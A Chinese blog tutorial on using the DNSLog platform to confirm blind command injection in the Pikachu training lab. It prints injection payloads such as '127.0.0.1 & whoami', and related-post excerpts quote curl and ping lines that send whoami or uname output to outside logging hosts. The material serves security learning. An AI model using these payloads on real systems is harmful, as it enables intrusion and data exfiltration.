DNSLog漏洞探测(四)之RCE漏洞实战

于 2023-12-12 12:42:22 发布
阅读量772 收藏 1
点赞数 1
分类专栏: DNSLog漏洞探测 文章标签: 安全 web安全 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_64973687/article/details/134946328
版权

DNSLog漏洞探测(四)之RCE漏洞实战

本文我们来学习如何利用DNSLog平台探测目标网站是否存在RCE漏洞,接下来我们还是利用Pikachu的靶场作为演示。首先我们先进入Pikachu靶场的RCE漏洞界面。

在这里插入图片描述

像是原本探测漏洞的手段,我们只需要在文本框中提交以下的payload就可以探测到该漏洞

127.0.0.1 & ipconfig
127.0.0.1 & whoami

在这里插入图片描述

点击 ping,就会发现该处执行了我们的命令

在这里插入图片描述

但是如果该处没有回显,那么就该利用DNSLog平台来解决无回显的问题了,首先我们打开DNSLog服务平台

在这里插入图片描述

点击 Get SubDomain 获取一个子域名,这里我们获取到的子域名是 9fqvxt.dnslog.cn

在这里插入图片描述

有关于RCE漏洞的DNSLog平台利用其实非常的简单,只需要在文本框去提交我们得到的子域名就好了

在这里插入图片描述

点击 ping 提交 payload,以下是点击 ping 返回后的界面

在这里插入图片描述

现在我们回到DNSLog服务平台,点击 Refresh Record刷新,然后DNSLog服务平台便会返回给我们DNSLog解析记录,这下我们就通过DNSLog平台验证了该处存在RCE漏洞

在这里插入图片描述

这个探测RCE漏洞的重点不在于 ping 通了什么样的服务器,而是在于验证该服务器是否能直接 ping 通外网,如果使用DNSLog平台去探测该RCE漏洞没有出现DNSLog解析记录,则证明该服务器不能直接连接外网。

怰月
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
复现Fastjson反序列化漏洞(从dnslog回显到rce再到反弹shell)
记录并分享学习安全的知识点..
07-11 2018
Fastjson是阿里巴巴的开源JSON解析库,它可以解析 JSON 格式的字符串,支持将 Java Bean 序列化为 JSON 字符串,也可以从 JSON 字符串反序列化到 JavaBean。它还可以用于将JSON字符串转换为等效的Java对象,fastjson爆出多个反序列化远程命令执行漏洞,攻击者可以通过此漏洞远程执行恶意代码来入侵服务器。......
利用DNSlog回显Weblogic(CVE-2017-10271) 漏洞执行命令结果
dfdhxb995397的博客
12-28 888
作者:Armyzer0 Weblogic(CVE-2017-10271) 漏洞出来以后又是一波血雨腥风,正好我昨天测试的时候发现了一个存在这个漏洞weblogic,但是他不回显咋办呢!让他返回执行结果集到dnslong首先大家先了解下 “ 这个符号在Linux的作用! 符号:` `名称:反引号,上分隔符位置:反引号(`)这个字符一般在键盘的左上角,数字1的左边,不要将...
RCE(远程命令执行)绕过总结
Elite的博客
04-18 3255
常见的RCE(远程命令执行)漏洞绕过方法,及原理讲解,干货满满!
在检测RCE漏洞时,判断RCE利用成功的方式有哪些(无回显情况)
weixin_42478365的博客
10-09 2030
第一种使用curl: curl "xxx.xxx.xxx.xxx/$(uname -a | awk '{print $1}')" 这条命令拼接了两处,第一处便是curl下我的一个vps服务器的80端口,第二处是显示内核版本。从服务器的web日志文件中看下效果: 发现操作系统的版本被拼接输出到后面,在面对没有回显的RCE或者CSRF都可以使用这个技巧。 第二种:DNSlog windows: 操作系统 盲注方式 windows %variable% linux variable 反引号 此处使用公网一个
godnslog:精美的dns&http日志服务器,用于验证SSRFXXERFIRCE漏洞
03-19
域名解析 dns&http日志服务器,用于验证SSRF / XXE / RFI / RCE漏洞 英文Doc | 特征 DNS日志 HTTPLGO 重新绑定 推送(回调) 多用户 dockerlized python / golang客户端SDK 作为标准名称解析服务,并支持A,CNAME,TXT,MX DNS日志 超级管理员用户:首次运行时, admin密码将显示在控制台日志中。您可以通过子命令resetpw更改 HTTP日志 建立前端 要求: yarn cd frontend yarn install yarn build 建立后端 要求: golang >= 1.13.0 go build 码头工人 docker build -t " user/godnslog " . 对于中国用户: docker build -t " user/godnslog " -f Docke
DNSLog使用方法
weixin_37104668的博客
09-14 1万+
DNSLOG的原理 DNS的解析是递归与迭代相结合的,下面给出了当我们访问www.cloudcrowd.com.cn时,DNS的解析过程示意图。 其中,红色部分是可控的。我们只需要搭建一个红色部分的DNS服务器,并将要盲打或盲注的回显,放到自己域名的二级甚至三级域名上去请求,就可以通过DNS解析日志来获取到它们。 DNSLOG工具 如果有自己的服务器和域名,可以自建一个这样的平台,直接使用BugScan团队开源的工具搭建即可: https://github.com/BugScanTeam/DNSLog
ThinkPHP3.2.x RCE漏洞通报1
08-03
3.寻找程序上传,上传件 1.功能代码中的assign法中第个变量为可控变量: 3.赋值结束后进display法中,display法开始解析并获取模板件内容,此
向日葵RCE漏洞(CNVD-2022-10270)检测工具
02-19
向日葵RCE漏洞(CNVD-2022-10270)检测工具,已经编译好,命令行运行即可 xrkrce.exe -h 127.0.0.1
LOG4J RCE 漏洞分享与自查.pdf
12-15
LOG4J RCE 漏洞分享与自查
向日葵RCE漏洞一键批量自己检测工具
02-25
测试自己向日葵是否存在RCE漏洞
如何利用三个漏洞组合达成Discord RCE漏洞 .pdf
09-05
如何利用三个漏洞组合达成Discord RCE漏洞 金融安全 安全人才 解决方案 金融安全 企业安全
浅析DNSlog在渗透测试中的实战技巧
道阻且长,行则将至。
05-23 1万+
文章目录前言SSRF 盲打XSS的盲打XXE的盲打SQL的盲注RCE的盲打总结 前言 在某些无法直接利用漏洞获得回显的情况下,但是目标可以发起 DNS 请求,这个时候就可以通过这种方式把想获得的数据外带出来。 DNS 的全称是 Domain Name System(网络名称系统),它作为将域名和IP地址相互映射,使人更方便地访问互联网。当用户输入某一网址如 www.baidu.com,网络上的 DNS Server 会将该域名解析,并找到对应的真实 IP 如 127.0.0.1,使用户可以访问这台服务器上相
mysql dnslog_DNSLOG | 利用总结
weixin_42298352的博客
01-27 509
0x00 写这篇博客的原因是wb在线的面试中无回显rce的问题在这里填了这个坑0x10 下面是几个常用的dnslog平台1 http://ceye.io/2 http://www.dnslog.cn/3 https://github.com/BugScanTeam/DNSLog(开源可自行搭建的平台)0x20 dnslog平台的作用现在很多漏洞都没有办法去回显,可是我们的payload已经执行,...
搭建一个自己的dnslog server
热门推荐
leeezp的博客
09-08 32万+
dnslog server 的用途就不用我多说了,log4j,反序列化,各种rce漏洞都可以用它来测试,但是公网的不稳定且很卡,在渗透中需要自己的一个稳定的server。部分域名提供商只允许修改 NS 记录为已经认证过的 NS 地址。所以需要找一个支持修改 NS 记录为自己 NS 的域名提供商。如果你需要内网的dns server,建议搭建dnsmasq。cloudflare 里有cdn,有一定隐藏ip作用。0x02 其他 dns server。
利用DNSlog技术间接判断漏洞是否存在的常用payload
nextdoor6的博客
06-13 4681
0x00 Command Execution i. *nix: curl http://ip.port.b182oj.ceye.io/`whoami` ping `whoami`.ip.port.b182oj.ceye.io ii. windows ping %USERNAME%.b182oj.ceye.io 0x01 SQL Injection From http://docs.
DNSLOG在渗透测试中的玩法儿
weixin_30558305的博客
12-29 846
首先了解一下DNS是啥???   DNS(Domain Name System,域名系统),万维网上作为域名和IP地址相互映射的一个分布式数据库,能够使用户更方便的访问互联网,而不用去记住能够被机器直接读取的IP数串。通过域名,最终得到该域名对应的IP地址的过程叫做域名解析(或主机名解析)。DNS协议运行在UDP协议之上,使用端口号53。在RFC文档中RFC 2181对DNS有规范说明...
DNSlog外带原理及注入分析
Sentiment的博客
04-27 1万+
前言 最近一直听到DNSlog外带原理等词但对其原理一直只是自己的理解(回显DNS请求后的日志)并没有真正的了解过,所以这里做一下记录。 DNSlog原理 DNS DNS(Domain Name System)就是域名系统,负责把域名转换成IP地址;例如向浏览器访问a.com,浏览器就会将其解析成真实的IP访问对应服务器上的服务。 DNSlog DNSlog就是DNS的日志,DNS在域名解析的时候会留下域名和解析IP的记录 DNSlog外带原理 DNS在解析的时候会留下日志,我们将信息放在高级域名中,传递到
mysql dns 注入_数据库DNSLog外带注入-总结
weixin_29279047的博客
01-19 933
sql注入中利用的骚姿势你又知道几个?DNSLog外带注入和DNSlog带外注入?(OOB)其实是一样的,叫法不同!本人还是习惯叫外带注入,自我感觉,比较顺口为什么需要外带注入?当我们对一个数据库进行注入时,无回显,且无法进行时间注入,那么就可以利用一个通道,把查询到数据通过通道带出去,这里的通道包括:http请求、DNS解析、SMB服务等将数据带出。of course!这里主讲DNSlog外带注...
CVE-2017-15715漏洞和SSI-RCE漏洞
最新发布
07-27
CVE-2017-15715是一个存在于Apache Tomcat软件中的漏洞,该漏洞使得攻击者可以通过发送特制的HTTP请求,触发目标服务器上的远程代码执行。这个漏洞的影响范围是Tomcat 9.0.0.M1到9.0.0.M28版本(不包括9.0.0.M9版本)。如果目标服务器受到此漏洞的影响,攻击者可以利用它执行任意代码,可能导致敏感信息泄露或服务器完全被控制。 SSI-RCE漏洞是一种服务器端包含(SSI)漏洞,可能导致远程命令执行。SSI是一种服务器端处理动态内容的技术,它允许将外部文件包含到网页中。如果服务器未正确配置和过滤用户提供的输入,攻击者可以通过注入恶意代码来执行任意命令。这种漏洞可能会导致服务器被完全控制,从而造成数据泄露、服务拒绝或其他恶意行为。 请注意,对于具体的漏洞信息和修复建议,请查阅相应漏洞的CVE编号或相关安全公告以获取更准确和详细的信息。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

怰月

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值